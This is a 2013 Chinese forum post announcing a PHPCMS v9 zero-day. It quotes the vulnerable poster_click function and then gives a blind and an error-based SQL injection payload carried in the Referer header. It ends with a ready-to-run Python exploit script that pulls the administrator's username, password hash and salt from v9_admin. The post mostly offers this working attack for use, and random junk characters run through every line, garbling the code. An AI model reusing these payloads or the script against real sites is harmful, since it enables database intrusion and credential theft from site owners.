有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
5 v) y3 W. Q2 q: H/ `) J8 a- O' ]$ }- `
问题函数\phpcms\modules\poster\index.php
- \1 l! a: u9 T# |" X4 r+ ` ?+ a0 W7 {, b; n0 H; ?1 Z
public function poster_click() {
9 u2 \/ b& S% u) ?5 E$id = isset($_GET['id']) ? intval($_GET['id']) : 0;9 ~" Y% x3 Q( T3 S* c) Z
$r = $this->db->get_one(array('id'=>$id));0 ?# g! A* o9 w) V
if (!is_array($r) && empty($r)) return false;8 \/ G5 U. M5 C/ |0 O0 O! z
$ip_area = pc_base::load_sys_class('ip_area');
( R+ T: D3 N* S9 E% t$ a$ip = ip();8 A7 n! |& A, o' d, `
$area = $ip_area->get($ip);
( ~% Y7 q: E! b' Y6 @3 G3 g$username = param::get_cookie('username') ? param::get_cookie('username') : '';5 j- O: k) l+ l9 k- ^* D
if($id) {
' G" g6 w! g0 J$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
+ V! L7 c0 W4 R' b& F$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));4 p" X. i" c G; h
}2 W2 b1 D* d8 Q2 n: C
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
# ~+ ~9 e8 `$ }" q! k& N# P$setting = string2array($r['setting']);5 D8 h( r4 L5 n& ~/ s" R
if (count($setting)==1) {
% P% P F0 s7 f4 R! Q/ ?$url = $setting['1']['linkurl'];
/ v2 g' L: g- ^} else {
% [+ `/ D8 A u2 Z& S0 o$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];- ~8 h. h% V& ` V8 Q- T
}
2 h, Q( a. m- V/ j6 cheader('Location: '.$url);
! T) U ]0 y, J2 F: T; F1 u}3 N: H- C2 x1 G: D: ]
9 L% j% s; t. b5 d5 M
9 B j( x( P6 d: h# Q$ o: S- s. H# L2 {% }& o5 x0 f9 ]
利用方式:( @1 a! T1 t( x, G# J6 w @0 K }
3 L, {, T3 Z0 A" s8 _$ R1、可以采用盲注入的手法:
' V5 n5 z) ?0 M0 C$ X9 Y4 b6 L. F$ _. D8 G
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
( V& `. ?) Q g7 [/ R* Z7 S7 Y
9 _4 t) b0 N1 D' M* r K通过返回页面,正常与否一个个猜解密码字段。
6 o: H! O6 K E3 J% V- h4 x" n( E* s# f$ f% O. [4 I4 f5 j. K+ ~6 H
2、代码是花开写的,随手附上了:
1 E X; n6 P& A% _) J5 n5 D7 t+ m. f. m( @5 w5 O- d$ i Y
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
+ f" C$ W& g/ G' j) m W0 ~0 u$ p
& Q7 e9 B1 V& O" S1 S- d此方法是爆错注入手法,原理自查。" M+ G, Z4 a; [7 V
5 t- L1 @5 B; i8 S3 {3 L' q7 l1 t
$ H" e; }( M3 R) _3 D- C3 O1 x+ z/ `% V1 Z# v5 }% x" i& `8 Y( s' V
利用程序:2 F. K! E! B! A4 j. ~
2 x0 L4 N; `) T9 O( E+ G+ O. y {
#!/usr/bin/env python" ?7 t1 l# ^- s; Y$ e8 N) f# J
import httplib,sys,re) Q1 j- L+ L* m/ O
1 W( }9 G0 D+ e/ _! E( Idef attack():
; V/ s, i6 _" w, L. k4 N7 B! O9 sprint “Code by Pax.Mac Team conqu3r!”
( I/ i, v3 a) s* I: _- u3 v5 ~print “Welcome to our zone!!!” b6 x5 F" P" C9 R" E9 g* ~" g; k! |
url=sys.argv[1]
/ _) C; A, z, Jpaths=sys.argv[2]
! i# C" x G X7 x% lconn = httplib.HTTPConnection(url)
$ h+ P' y7 j" G. B+ b6 ei_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,% i9 R/ U- O2 [' h2 c
“Accept”: “text/plain”,8 j. D4 {5 s' W
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}1 b( t8 F3 R9 V, s. R; L
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
7 g( _' A! r6 n$ Tr1 = conn.getresponse()
1 w" B$ }$ B6 w& I; Edatas=r1.read()1 \: J! L. A } w. t- u& L
datas=re.findall(r”Duplicate entry \’\w+’”, datas): F8 x. v- V5 B. Z8 o1 F9 o
print datas[0]6 e2 L$ ]9 ~7 s7 V! W
conn.close()
. |5 O' C' c" C" ^if __name__==”__main__”:1 r5 k! L$ t3 N6 y
if len(sys.argv)<3:' f8 Z+ r* q0 Q- g
print “Code by Pax.Mac Team conqu3r”
2 j5 r. r- B+ I4 q/ q9 H6 Q2 Uprint “Usgae:”/ M. t) g+ q7 ]
print “ phpcmsattack.py www.paxmac.org /”- _- z# w R5 U( \5 x' C. F
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
) M1 r; I& c0 j( { Tsys.exit(1)! J2 N8 G4 o6 p
attack()
' S: n4 L" ]. `# i5 |& g( |1 S0 m- V a
|
发表于 2013-1-11 21:01:00
收藏
支持
反对